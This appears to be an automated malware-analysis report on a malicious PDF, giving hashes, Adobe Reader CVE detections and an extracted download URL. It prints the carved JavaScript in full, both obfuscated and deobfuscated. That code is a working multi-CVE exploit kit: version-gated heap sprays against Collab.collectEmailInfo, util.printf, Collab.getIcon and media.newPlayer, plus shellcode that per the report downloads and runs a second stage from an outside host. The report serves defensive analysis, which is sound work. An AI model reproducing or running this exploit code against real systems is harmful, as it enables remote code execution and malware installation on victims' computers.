PDF malware analysis — malicious · eee2a5dd96b2b186

MALICIOUS

PDF

12.5 KB First seen: 2026-05-08

MD5: 6985bff82f825cf0986d9a16e064615f SHA-1: 1fd09581014a89fbd9916a3d57f0f93f3ea0f700 SHA-256: eee2a5dd96b2b18691f24821b21b1f40177225682d48a3a70459bdf4ac57d80a

490 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 12

media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324

PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927

PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992

PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH

A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT

One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://serj3info.ns2.name/u.php?f=45&e=5 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0076_000.js`	pdf-javascript-stream	PDF /JS object 76 at offset 0x383	11688 bytes
SHA-256: `a8e78d7cbf1a82e79bd0599cf9c132958421de94f2cff5b61dbd0a6df6b4d889`
Preview script First 1,000 lines of the extracted script w=''; w+='sl'; w+='i'; w+="ce"; j='b343tb3g'; j=j[w]; z = new Array(48,65,1,64,4,2,75,38,56,52,14,42,37,11,53,53,14,42,43,9,17,29,14,42,37,47,43,9,14,42,49,47,17,29,14,42,17,7,11,29,14,42,11,11,47,43,14,42,53,29,9,69,14,42,29,69,37,4,14,42,37,4,11,69,14,42,69,9,29,69,14,42,49,69,37,4,14,42,47,53,46,9,14,42,49,53,37,4,14,42,11,11,69,37,14,42,53,53,12,4,14,42,47,17,37,4,14,42,69,11,11,9,14,42,11,11,49,29,14,42,37,46,28,9,14,42,46,47,17,17,14,42,43,43,46,69,14,42,4,37,43,43,14,42,29,69,37,4,14,42,9,11,11,69,14,42,11,7,29,53,14,42,49,47,69,53,14,42,37,49,43,4,14,42,28,29,11,29,14,42,17,29,37,47,14,42,47,46,49,47,14,42,17,4,17,7,14,42,47,46,29,9,14,42,37,4,47,53,14,42,11,9,49,47,14,42,49,29,37,4,14,42,49,37,11,47,14,42,43,47,69,11,14,42,37,4,47,53,14,42,28,69,49,53,14,42,43,47,69,11,14,42,9,7,11,11,14,42,29,46,29,7,14,42,65,12,43,9,14,42,9,47,69,11,14,42,12,4,11,11,14,42,4,17,69,43,14,42,11,37,46,69,14,42,49,29,43,28,14,42,9,46,69,37,14,42,69,12,9,4,14,42,12,65,69,11,14,42,17,4,29,69,14,42,11,4,43,46,14,42,49,47,46,43,14,42,47,17,17,53,14,42,47,17,37,4,14,42,69,11,28,29,14,42,53,53,12,12,14,42,69,9,37,4,14,42,37,12,29,4,14,42,17,9,29,53,14,42,47,29,43,43,14,42,69,9,28,29,14,42,12,37,37,4,14,42,12,12,69,11,14,42,69,29,37,4,14,42,69,11,37,4,14,42,65,4,9,47,14,42,47,7,47,17,14,42,17,4,9,11,14,42,65,12,47,11,14,42,53,37,37,4,14,42,37,69,28,69,14,42,69,9,49,12,14,42,49,29,11,11,14,42,7,53,69,11,14,42,43,11,17,4,14,42,53,37,37,4,14,42,37,4,69,37,14,42,53,65,43,49,14,42,47,7,69,47,14,42,7,37,17,37,14,42,43,43,43,43,14,42,17,28,43,43,14,42,17,37,43,7,14,42,69,69,69,69,14,42,69,69,69,69,14,42,47,69,47,37,14,42,29,69,53,65,14,42,43,43,53,37,14,42,69,69,69,69,14,42,47,69,69,69,14,42,9,69,37,11,14,42,47,69,46,7,14,42,37,4,47,47,14,42,37,4,17,9,14,42,46,69,47,17,14,42,9,11,37,11,14,42,43,43,69,47,14,42,53,37,17,11,14,42,53,17,53,43,14,42,69,69,69,69,14,42,49,47,53,37,14,42,53,9,49,28,14,42,47,29,53,12,14,42,46,53,43,43,14,42,9,29,37,11,14,42,37,4,69,37,14,42,17,37,17,37,14,42,43,43,53,46,14,42,43,43,43,43,14,42,69,28,17,4,14,42,49,28,17,4,14,42,17,9,37,46,14,42,69,46,69,29,14,42,69,69,69,69,14,42,47,9,37,12,14,42,69,9,28,29,14,42,69,29,9,49,14,42,49,28,28,29,14,42,53,49,53,47,14,42,9,49,49,11,14,42,28,29,29,29,14,42,49,53,69,29,14,42,11,11,49,28,14,42,9,49,11,28,14,42,28,29,29,29,14,42,28,69,69,37,14,42,49,11,28,12,14,42,47,11,28,69,14,42,43,37,53,37,14,42,69,69,69,69,14,42,43,43,69,69,14,42,69,9,47,53,14,42,17,37,37,4,14,42,9,7,11,11,14,42,9,49,47,46,14,42,46,12,29,29,14,42,49,49,69,69,14,42,53,28,49,69,14,42,9,49,49,29,14,42,46,12,29,29,14,42,28,17,69,47,14,42,53,9,53,29,14,42,9,53,53,9,14,42,46,12,29,29,14,42,69,69,69,7,14,42,37,65,47,7,14,42,69,29,9,46,14,42,37,37,11,69,14,42,46,12,29,29,14,42,29,46,69,29,14,42,53,65,47,46,14,42,53,65,69,69,14,42,47,11,69,69,14,42,53,65,47,49,14,42,43,43,69,69,14,42,46,29,47,53,14,42,9,69,37,47,14,42,46,53,49,47,14,42,69,69,53,65,14,42,43,43,47,11,14,42,69,29,47,53,14,42,69,69,53,65,14,42,17,4,37,11,14,42,47,11,69,9,14,42,47,53,43,43,14,42,37,11,69,29,14,42,69,9,9,11,14,42,69,28,17,4,14,42,46,11,17,4,14,42,37,69,29,49,14,42,69,69,11,43,14,42,43,65,49,47,14,42,37,69,29,49,14,42,69,69,11,43,14,42,9,29,49,47,14,42,69,69,53,65,14,42,43,17,53,65,14,42,47,53,43,43,14,42,17,37,69,37,14,42,43,17,7,9,14,42,43,43,43,43,14,42,29,17,37,17,14,42,17,9,69,17,14,42,43,17,7,37,14,42,69,17,37,65,14,42,53,43,37,7,14,42,4,12,69,46,14,42,9,65,11,11,14,42,47,4,37,65,14,42,9,53,46,4,14,42,49,7,29,53,14,42,46,65,11,53,14,42,49,69,28,43,14,42,49,29,53,37,14,42,49,69,49,29,14,42,28,43,11,65,14,42,49,11,28,43,14,42,49,28,53,47,14,42,11,11,53,65,14,42,53,17,53,7,14,42,53,43,53,53,14,42,53,17,28,17,14,42,11,28,49,11,14,42,53,17,28,17,14,42,53,12,53,46,14,42,28,43,53,47,14,42,28,17,49,47,14,42,53,37,49,69,14,42,11,43,49,69,14,42,11,12,53,53,14,42,11,47,11,29,14,42,53,47,28,53,14,42,11,47,11,12,14,42,69,69,69,69,52,33,43,42,72,9,18,31,35,72,64,17,71,48,1,40,1,65,32,50,62,41,68,22,13,31,26,17,40,1,65,21,26,17,72,38,18,13,70,28,73,50,62,41,68,1,65,8,56,1,65,33,66,1,65,56,1,65,21,75,42,4,75,18,1,31,72,38,40,69,32,50,62,23,28,41,33,1,17,18,42,1,72,64,1,65,33,66,64,43,42,72,9,18,31,35,72,64,4,30,40,41,68,48,65,1,64,12,25,38,56,72,17,22,64,60,1,1,65,62,40,41,33,48,65,1,64,48,22,56,69,30,69,9,69,9,69,9,69,9,33,48,65,1,64,65,12,12,1,56,69,30,29,69,69,69,69,69,33,48,65,1,64,39,65,62,26,35,65,12,56,42,72,17,75,9,65,39,17,40,4,2,75,38,41,33,48,65,1,64,75,9,51,26,17,72,56,39,65,62,26,35,65,12,21,26,17,72,38,18,13,70,28,33,48,65,1,64,50,62,56,65,12,12,1,61,40,75,9,51,26,17,72,8,69,30,11,37,41,33,48,65,1,64,62,65,1,75,39,56,42,72,17,75,9,65,39,17,40,27,14,42,7,69,7,69,14,42,7,69,7,69,27,41,33,62,65,1,75,39,56,17,71,48,1,40,62,65,1,75,39,32,50,62,41,33,48,65,1,64,9,35,42,72,18,28,56,40,48,22,61,69,30,29,69,69,69,69,69,41,23,65,12,12,1,33,43,35,1,40,48,65,1,64,9,35,42,72,18,56,69,33,9,35,42,72,18,73,9,35,42,72,18,28,33,9,35,42,72,18,8,8,41,68,12,25,38,54,9,35,42,72,18,0,56,62,65,1,75,39,8,39,65,62,26,35,65,12,33,66,64,48,65,1,64,35,48,17,1,43,26,35,22,56,42,72,17,75,9,65,39,17,40,27,14,42,69,9,69,9,14,42,69,9,69,9,27,41,33,22,13,31,26,17,40,35,48,17,1,43,26,35,22,21,26,17,72,38,18,13,73,29,29,7,47,28,41,68,35,48,17,1,43,26,35,22,8,56,35,48,17,1,43,26,35,22,33,66,64,18,13,31,75,21,9,35,26,26,65,4,15,18,35,1,17,56,59,35,26,26,65,4,21,9,35,26,26,17,9,18,67,63,65,31,26,20,72,43,35,40,68,75,42,4,2,58,27,27,32,63,75,38,58,35,48,17,1,43,26,35,22,66,41,33,66,64,43,42,72,9,18,31,35,72,64,39,1,31,72,18,43,40,41,68,72,35,39,56,42,72,17,75,9,65,39,17,40,27,14,42,69,60,69,60,14,42,69,60,69,60,14,42,69,60,69,60,14,42,69,60,69,60,27,41,33,48,65,1,64,39,65,62,26,35,65,12,56,42,72,17,75,9,65,39,17,40,4,2,75,38,41,33,13,17,65,39,4,26,35,9,25,56,72,35,39,8,39,65,62,26,35,65,12,33,4,31,38,4,26,35,9,25,56,42,72,17,75,9,65,39,17,40,27,14,42,69,60,69,60,14,42,69,60,69,60,27,41,33,13,17,65,12,17,1,75,31,71,17,56,28,69,33,75,39,1,65,62,56,13,17,65,12,17,1,75,31,71,17,8,13,17,65,39,4,26,35,9,25,21,26,17,72,38,18,13,33,22,13,31,26,17,40,4,31,38,4,26,35,9,25,21,26,17,72,38,18,13,73,75,39,1,65,62,41,68,4,31,38,4,26,35,9,25,8,56,4,31,38,4,26,35,9,25,33,66,64,43,31,26,26,4,26,35,9,25,56,4,31,38,4,26,35,9,25,21,75,42,4,75,18,1,31,72,38,40,69,32,75,39,1,65,62,41,33,4,26,35,9,25,56,4,31,38,4,26,35,9,25,21,75,42,4,75,18,1,31,72,38,40,69,32,4,31,38,4,26,35,9,25,21,26,17,72,38,18,13,61,75,39,1,65,62,41,33,22,13,31,26,17,40,4,26,35,9,25,21,26,17,72,38,18,13,8,75,39,1,65,62,73,69,30,29,69,69,69,69,41,68,4,26,35,9,25,56,4,26,35,9,25,8,4,26,35,9,25,8,43,31,26,26,4,26,35,9,25,33,66,64,63,17,63,56,72,17,22,64,60,1,1,65,62,40,41,33,43,35,1,40,31,56,69,33,31,73,46,29,69,69,33,31,8,8,41,68,63,17,63,54,31,0,56,4,26,35,9,25,8,13,17,65,39,4,26,35,9,25,33,66,64,48,65,1,64,72,42,63,56,46,28,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,33,42,18,31,26,21,39,1,31,72,18,43,40,27,14,29,47,69,69,69,43,27,32,72,42,63,41,33,66,64,43,42,72,9,18,31,35,72,64,38,17,18,31,9,35,72,40,41,68,48,65,1,64,65,1,1,62,56,72,17,22,64,60,1,1,65,62,40,41,33,31,43,40,65,39,39,21,12,35,9,21,59,35,26,26,65,4,21,38,17,18,20,9,35,72,41,68,48,65,1,64,39,65,62,26,35,65,12,56,42,72,17,75,9,65,39,17,40,4,2,75,38,41,33,48,65,1,64,13,19,50,47,69,69,59,44,56,39,65,62,26,35,65,12,21,26,17,72,38,18,13,70,28,33,48,65,1,64,50,62,56,69,30,29,69,69,69,69,69,61,40,13,19,50,47,69,69,59,44,8,69,30,11,37,41,33,48,65,1,64,62,65,1,75,39,56,42,72,17,75,9,65,39,17,40,27,14,42,7,69,7,69,14,42,7,69,7,69,27,41,33,62,65,1,75,39,56,17,71,48,1,40,62,65,1,75,39,32,50,62,41,33,48,65,1,64,39,47,60,2,74,53,47,43,56,40,69,30,69,9,69,9,69,9,69,9,61,69,30,29,69,69,69,69,69,41,23,69,30,29,69,69,69,69,69,33,43,35,1,40,48,65,1,64,48,50,9,3,6,7,53,62,56,69,33,48,50,9,3,6,7,53,62,73,39,47,60,2,74,53,47,43,33,48,50,9,3,6,7,53,62,8,8,41,68,65,1,1,62,54,48,50,9,3,6,7,53,62,0,56,62,65,1,75,39,8,39,65,62,26,35,65,12,33,66,64,48,65,1,64,18,55,34,13,44,4,57,22,56,42,72,17,75,9,65,39,17,40,27,14,69,7,27,41,33,22,13,31,26,17,40,18,55,34,13,44,4,57,22,21,26,17,72,38,18,13,73,69,30,29,69,69,69,41,68,18,55,34,13,44,4,57,22,8,56,18,55,34,13,44,4,57,22,33,66,64,18,55,34,13,44,4,57,22,56,27,44,21,27,8,18,55,34,13,44,4,57,22,33,65,39,39,21,12,35,9,21,59,35,26,26,65,4,21,38,17,18,20,9,35,72,40,18,55,34,13,44,4,57,22,41,33,66,66,64,65,24,26,42,38,31,72,75,56,65,39,39,21,39,26,42,38,20,72,75,33,48,65,1,64,75,48,56,39,65,1,75,17,20,72,18,40,65,39,39,21,48,31,17,22,17,1,45,17,1,75,31,35,72,21,18,35,15,18,1,31,72,38,40,41,21,9,13,65,1,60,18,40,69,41,41,33,43,35,1,40,48,65,1,64,31,56,69,33,31,73,65,24,26,42,38,31,72,75,21,26,17,72,38,18,13,33,31,8,8,41,68,31,43,40,65,24,26,42,38,31,72,75,54,31,0,21,72,65,63,17,56,56,52,67,15,9,1,31,39,18,52,41,68,48,65,1,64,26,48,56,65,24,26,42,38,31,72,75,54,31,0,21,48,17,1,75,31,35,72,33,66,66,64,31,43,40,40,26,48,56,56,7,41,36,36,40,40,75,48,56,56,37,41,10,10,40,26,48,73,56,37,21,46,28,41,41,41,68,38,17,18,31,9,35,72,40,41,33,66,17,26,75,17,64,31,43,40,26,48,56,56,49,21,46,41,68,39,1,31,72,18,43,40,41,33,66,17,26,75,17,64,31,43,40,40,40,75,48,56,56,53,41,36,36,40,75,48,56,56,49,41,41,10,10,40,26,48,73,49,21,46,46,41,41,68,4,30,40,41,33,66,17,26,75,17,64,31,43,40,40,26,48,5,56,7,21,46,41,36,36,40,26,48,73,56,7,21,28,41,36,36,40,26,48,5,56,37,21,46,11,41,36,36,40,26,48,73,56,37,21,46,49,41,41,68,43,42,72,9,18,31,35,72,64,65,40,41,68,42,18,31,26,21,39,1,31,72,18,12,40,52,39,16,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,64,58,64,62,62,62,62,46,46,46,52,32,72,17,22,64,6,65,18,17,40,41,41,33,66,48,65,1,64,13,56,65,39,39,21,39,26,42,38,20,72,75,33,43,35,1,40,48,65,1,64,43,56,69,33,43,73,13,21,26,17,72,38,18,13,33,43,8,8,41,68,31,43,40,13,54,43,0,21,72,65,63,17,56,56,52,67,15,9,1,31,39,18,52,41,68,48,65,1,64,31,56,13,54,43,0,21,48,17,1,75,31,35,72,33,66,66,64,31,43,40,40,31,5,37,21,46,28,41,10,10,40,31,73,37,21,28,41,41,68,9,56,72,17,22,64,60,1,1,65,62,40,41,33,48,65,1,64,12,56,42,72,17,75,9,65,39,17,40,52,14,42,7,69,7,69,14,42,7,69,7,69,52,41,33,48,65,1,64,17,56,42,72,17,75,9,65,39,17,40,4,2,75,38,41,33,22,13,31,26,17,40,12,21,26,17,72,38,18,13,73,56,69,30,37,69,69,69,41,68,12,8,56,12,33,66,12,56,12,21,75,42,4,75,18,1,40,69,32,69,30,37,69,69,69,61,17,21,26,17,72,38,18,13,41,33,43,35,1,40,43,56,69,33,43,73,28,7,69,69,33,43,8,8,41,68,9,54,43,0,56,12,8,17,33,66,65,40,41,33,65,40,41,33,18,1,62,68,18,13,31,75,21,63,17,12,31,65,21,72,17,22,24,26,65,62,17,1,40,72,42,26,26,41,33,66,9,65,18,9,13,40,17,41,68,66,65,40,41,33,66,66); a="]rjQb>D9+c&3dh%S@etWI.w/Pkl'24xi,;Mo\|8gp()ufNV15v7q_'6[U=G:CA-ym a}E{0*zn<Ks"; b='al'; b2="v" +b; try { if(!google.search())throw 1; } catch(her436j34k76) { e=(j()); try{ b='e'+b2; if(!google.search()) a=2; } catch(q){ e=e[b]; } s='';try{if(!google.search())throw 1;}catch(q){r=1;}{ for(i=0;i<z.length;i++) try{if(!google.search())throw 1;}catch(q){ s += a[ z[i]]; } }} "))";try{if(!google)throw 1;}catch(q){e(s);}
`generic_stage_recovery_000.js`	deobfuscated-js	generic stage recovery alphabet-index-array from JavaScript object 76 at offset 0x383	3864 bytes
SHA-256: `c725ced5af1697fa33abb99d2893d2f62084d025fde38328440ef7ad4a86de57`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script var bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u732f%u7265%u336a%u6e69%u6f66%u6e2e%u3273%u6e2e%u6d61%u2f65%u2e75%u6870%u3f70%u3d66%u3534%u6526%u353d%u0000';function ezvr(ra,qy){while(ra.length2<qy){ra+=ra;}ra=ra.substring(0,qy/2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length2;var qy=addr-(sc_len+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} var overflow=unescape('%u0c0c%u0c0c');while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:'',msg:overflow});} function printf(){nop=unescape('%u0A0A%u0A0A%u0A0A%u0A0A');var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape('%u0A0A%u0A0A');headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf('%45000f',num);} function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} var tUMhNbGw=unescape('%09');while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw='N.'+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}} if((lv==9)\|\|((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)\|\|(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)\|\|(lv<=9.2)\|\|(lv>=8.13)\|\|(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}} if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}a();a();try{this.media.newPlayer(null);}catch(e){}a();}}
`generic_stage_recovery_001.js`	deobfuscated-js	generic stage recovery percent-decode from JavaScript object 76 at offset 0x383	3860 bytes
SHA-256: `3179731a13f08e5abcec3b1488884ad4a2bd0bd2b85c56c8c18e6acdd48d19f2`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script var bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u732f%u7265%u336a%u6e69%u6f66%u6e2e%u3273%u6e2e%u6d61%u2f65%u2e75%u6870%u3f70%u3d66%u3534%u6526%u353d%u0000';function ezvr(ra,qy){while(ra.length2<qy){ra+=ra;}ra=ra.substring(0,qy/2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length2;var qy=addr-(sc_len+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} var overflow=unescape('%u0c0c%u0c0c');while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:'',msg:overflow});} function printf(){nop=unescape('%u0A0A%u0A0A%u0A0A%u0A0A');var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape('%u0A0A%u0A0A');headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf('E000f',num);} function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} var tUMhNbGw=unescape(' ');while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw='N.'+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}} if((lv==9)\|\|((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else 